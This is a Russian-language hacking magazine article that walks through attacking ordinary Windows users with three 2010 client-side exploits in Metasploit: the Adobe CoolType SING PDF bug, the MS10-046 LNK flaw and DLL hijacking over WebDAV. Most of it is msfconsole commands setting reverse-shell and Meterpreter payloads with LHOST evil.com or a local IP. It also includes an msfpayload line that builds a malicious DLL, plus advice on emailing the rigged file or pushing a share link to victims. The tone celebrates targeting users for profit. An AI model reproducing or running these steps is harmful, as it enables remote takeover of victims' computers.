Компьютеры
теперь везде и вся. Несчастных
юзеров полным-полно. Почему
несчастных? Да потому что во
многом они стали основной целью
для "хакерских атак" :).
Особенно с развитием всяких
систем переводов, интернет-банкинга и других видов
электронных денег. Теперь снять
профит с обычного юзера – не
проблема. И это уже не считая
классики типа спама, ботнетов,
DoS’ов, кражи конфиденциально
информации. Антивирусы, фаеры,
IDS’ы, системы обновления ПО,
сэндбоксы спасают только
небольшую толпу продвинутых
юзеров/фирм, так как их надо и
настроить, и правильно
реагировать на угрозы, и купить
само ПО. В итоге имеем широкий
выбор из миллионов
менеджеров/бухгалтеров для
"работы" с ними :).

А тут еще
и реально критические уязвимости
от таких контор, как Microsoft и
Adobe, чье ПО является де-факто
стандартом по миру. Да, в этом
смысле лето было богатым!
В качестве примера я приведу три
сплоита: Adobe Acrobat PDF
Cooltype Sing (версии
<=9.3.4/8.2.4), MS DLL
Hijacking, MS LNK
сплоит(MS10-046). Описание
подробностей сплоитов ты можешь
прочитать в "Обзоре эксплойтов"
от Алексея Синцова в этом и в
прошлом номерах.

Как ни странно, все примеры
реализованы с помощью Metasploit
Framework. Тут надо отдать
должное создателям MSF – они
чрезвычайно быстро стали
добавлять сплоиты к самым
массовым критическим
уязвимостям. Некоторые
реализации уязвимостей и вовсе
появляются сразу в MSF, без
сторонних PoC’ов. Все три
перечисленные уязвимости были
0-day, когда попали в MSF.
Сейчас уже есть кое-какие патчи,
но вернемся к делу.

1) Adobe
Acrobat PDF Cooltype Sing. Adobe
этим летом дал миру несколько
суровых дыр. Это одна из них.
Заходим в msfconsole и:

Выбираем сплоит:

msf >
use
exploit/windows/fileformat/adobe_cooltype_sing

Задаем имя файла:

msf >
set
FILENAME xakep_ubileinyi_vypusk.pdf

Куда сохраняем? В home:

msf >
set
OUTPUTPATH ~

Выбираем нагрузку и ее
настройки:

msf >
set
PAYLOAD
windows/shell/reverse_tcp
msf > set
LHOST evil.com
msf > set
LPORT 80

Теперь на наш evil.com вешаем
netcat, например, и посылаем
жертве файлик по почте. Простой
реверсовый шелл нужен,
во-первых, чтобы обойти NAT,
файер, а во-вторых, чтобы не
привязываться к процессу (чтобы
соединение не оборвалось при
закрытии Acrobat Reader’а).

Есть аналогичный сплоит, но
проводящий атаку через браузер и
Adobe’овский плагин к нему –
exploit/windows/browser/adobe_cooltype_sing.

2) MS LNK
сплоит (MS10-046). Сплоит из
разряда фич 🙂

Выбираем сплоит:

msf >use
windows/browser/ms10_046_shortcut_icon_dllloader

Настраиваем пэйлоад:

msf >set
PAYLOAD
windows/meterpreter/reverse_tcp
msf >set
LHOST
192.168
.0.101

По сути, сплоит поднимает
WebDAV и кидает туда ярлыки. В
результате либо даем бедному
пользователю полученную ссылку,
либо делаем ярлычок на ресурс.
То есть сплоит из локального
стал удаленным (через шару и
WebDAV). Павним бедного юзера –
ему вряд ли что-то поможет :).
Злую DLL’ку для этого и
следующего сплоита можно создать
и ручками. Ярлычок, понятное
дело, тоже.



$msfpayload

windows/meterpreter/reverse_tcp
LHOST=192.168.0.101
D > evil.dll

Где

  • windows/meterpreter/reverse_tcp
    – название нагрузки,
  • LHOST=192.168.0.101 –
    настройки
  • D – указываем, что
    создаем DLL’ку;
  • evil.dll – имя итогового
    файла.

3) MS DLL
Hijacking

Это очень забавная вещь! С ее
помощью мы фактически можем
"превратить" любой миролюбивый
формат файла во что-то злое.
Пришлют тебе файлы с
какой-нибудь презентацией или
чертежами AutoCAD’а, например. А
среди них какая-то библиотечка
валяется. Бывает ведь. Ты,
конечно же, запустишь сам
чертеж, а тут – бац! – и у тебя
бэкдор. Хорошее дело!
Подробное описание "почему и
зачем так" смотри на следующей
странице у Алексея Синцова :).

А теперь – немного практики.

Выбираем сплоит:

msf >
use
windows/browser/webdav_dll_hijacker

Задаем имя файлов:

msf >
set
BASENAME policy

Задаем расширение файла:

msf >
set
EXTENSIONS ppt

Имя для шары:

msf >
set
SHARENAME docs

Нагрузка:

msf >
set
PAYLOAD windows/meterpreter/bind_tcp

После этого либо впариваем
жертве ссылку на шару –
\\192.168.0.101\docs\, либо на
HTTP-сервак – http://192.168.0.101:80.
Жертва открывает файлик – мы
получаем шелл. Честный обмен :).

Опять же, по сути, локальная
уязвимость превратилась в
удаленную за счет шары и WebDAV.
Вот такими тремя client-site
багами мы можем положить на
лопатки все версии Windows, от
XP до 7. Антивири и файеры –
тоже не помеха при небольших
доработках методов :).

Оставить мнение

Check Also

LUKS container vs Border Patrol Agent. Как уберечь свои данные, пересекая границу

Не секрет, что если ты собрался посетить такие страны как США или Великобританию то, прежд…